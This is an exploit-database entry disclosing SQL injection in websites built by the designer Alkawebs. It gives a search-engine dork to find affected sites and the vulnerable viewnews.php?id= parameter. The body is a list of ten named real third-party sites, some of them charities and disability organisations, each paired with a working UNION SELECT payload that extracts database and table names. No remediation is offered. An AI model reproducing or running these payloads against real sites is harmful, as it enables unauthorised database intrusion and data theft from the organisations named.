Designed by Alkawebs SQL Injection

2016.01.29
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

[+][+][+][+][+][+][+][+] [+] Title: Designed by Alkawebs SQL Injection [+] Dork: intext:"Designed by Alkawebs" [+] Vendor Homepage: alkawebs.co.uk [+] Author : Milad_Inj3ct0r [+] Date : Friday, January 29, 2016 [+][+][+][+][+][+][+][+] [+] Vulnerability At : [+] site.com/viewnews.php?id= [ ID ] [+][+][+][+][+][+][+][+] [+] Examples : [-] http://www.chores4you.co.uk/viewnews.php?id=-2 union select 1,database(),3,4,5--+ [-] http://www.pakistancommunitycentrederby.co.uk/viewnews.php?id=-10 union select 1,table_name,3,4,5 from information_schema.tables limit 0,1--+ [-] http://disabilitydirect.com/nottingham/viewnews.php?id=-8 union select 1,table_name,3,4,5 from information_schema.tables limit 0,1--+ [-] http://www.thestuff.org.uk/viewnews.php?id=-160 union select 1,table_name,3,4,5 from information_schema.tables limit 0,1--+ [-] http://accessindudley.org.uk/viewnews.php?id=-49 union select 1,table_name,3,4,5 from information_schema.tables limit 0,1--+ [-] http://www.ddenterprise.co.uk/viewnews.php?id=-4 union select 1,table_name,3,4,5 from information_schema.tables limit 0,1--+ [-] http://www.vcmexams.co.uk/viewnews.php?id=-18 union select 1,table_name,3,4,5 from information_schema.tables limit 0,1--+ [-] http://www.moltenmetalproducts.com/viewnews.php?id=-3 union select 1,table_name,3,4,5 from information_schema.tables limit 0,1--+ [-] http://derbycivicsociety.co.uk/viewnews.php?id=-3 union select 1,table_name,3,4,5 from information_schema.tables limit 0,1--+ [-] http://dudleycil.org.uk/viewnews.php?id=-7 union select 1,table_name,3,4,5 from information_schema.tables limit 0,1--+ [+][+][+][+][+][+][+][+] [+] Thanks To : Kamran HeLlish , Dr.root , Dr.reprimand , Alireza_Promis , Sajjad Soutodeh


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top